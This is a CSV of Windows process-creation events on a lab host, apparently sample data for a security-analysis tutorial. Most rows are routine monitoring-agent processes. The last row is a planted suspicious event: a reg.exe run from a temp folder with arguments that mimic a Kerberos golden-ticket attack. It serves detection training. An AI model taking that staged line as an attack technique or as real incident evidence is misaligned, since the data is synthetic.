Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
Azure
GitHub Repository: Azure/Azure-Sentinel-Notebooks
 Path: blob/master/tutorials-and-examples/feature-tutorials/data/processes_on_host.csv
3255 views
,TenantId,Account,EventID,TimeGenerated,Computer,SubjectUserSid,SubjectUserName,SubjectDomainName,SubjectLogonId,NewProcessId,NewProcessName,TokenElevationType,ProcessId,CommandLine,ParentProcessName,TargetLogonId,SourceComputerId,TimeCreatedUtc
0,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:24:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1610,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:24:24.010
1,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:24:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1790,C:\Windows\System32\conhost.exe,%%1936,0x1610,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:24:24.023
2,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:24:25.807,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xcd8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:24:25.807
3,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:24:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x28c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:24:26.010
4,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:07:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1284,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:07:26.003
5,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:08:24.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb10,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:08:24.013
6,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:08:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x2a8,C:\Windows\System32\conhost.exe,%%1936,0xb10,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:08:24.030
7,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:08:25.717,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x90c,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:08:25.717
8,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:08:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x130c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:08:26.007
9,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:09:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc84,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:09:26.010
10,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:10:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x570,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:10:24.000
11,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:10:24.047,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x28c,C:\Windows\System32\conhost.exe,%%1936,0x570,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:10:24.047
12,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:10:25.653,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:10:25.653
13,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:10:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd14,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:10:26.000
14,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:20:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1490,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:20:24.000
15,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:20:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x148c,C:\Windows\System32\conhost.exe,%%1936,0x1490,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:20:24.017
16,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:20:25.337,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1414,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:20:25.337
17,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:20:26.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1530,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:20:26.017
18,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:21:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x7b4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:21:26.003
19,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:17:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1594,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:17:26.000
20,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:18:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1630,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:18:24.010
21,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:18:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x16a0,C:\Windows\System32\conhost.exe,%%1936,0x1630,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:18:24.027
22,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:18:25.407,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1694,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:18:25.407
23,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:18:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1658,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:18:26.010
24,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:19:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1740,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:19:26.000
25,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:47:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd14,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:47:26.000
26,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:48:24.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1094,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:48:24.013
27,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:48:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1270,C:\Windows\System32\conhost.exe,%%1936,0x1094,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:48:24.030
28,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:48:25.743,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc10,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:48:25.743
29,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:48:26.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6ec,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:48:26.017
30,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:39:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1388,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:39:26.000
31,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:40:24.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc08,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:40:24.013
32,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:40:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x364,C:\Windows\System32\conhost.exe,%%1936,0xc08,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:40:24.027
33,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:40:25.393,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1338,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:40:25.393
34,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:40:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x12fc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:40:26.000
35,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:37:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1128,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:37:26.007
36,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:38:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13fc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:38:24.000
37,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:38:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x123c,C:\Windows\System32\conhost.exe,%%1936,0x13fc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:38:24.020
38,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:38:25.453,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13e8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:38:25.453
39,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:38:26.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6bc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:38:26.017
40,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:17:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1254,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:17:26.000
41,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:18:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11b0,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:18:24.003
42,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:18:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1d0,C:\Windows\System32\conhost.exe,%%1936,0x11b0,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:18:24.020
43,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:18:25.490,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1070,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:18:25.490
44,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:18:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6ec,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:18:26.010
45,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:13:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc84,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:13:26.007
46,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.167,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16fc,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg  not /domain:everything that /sid:shines is /krbtgt:golden !,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.167
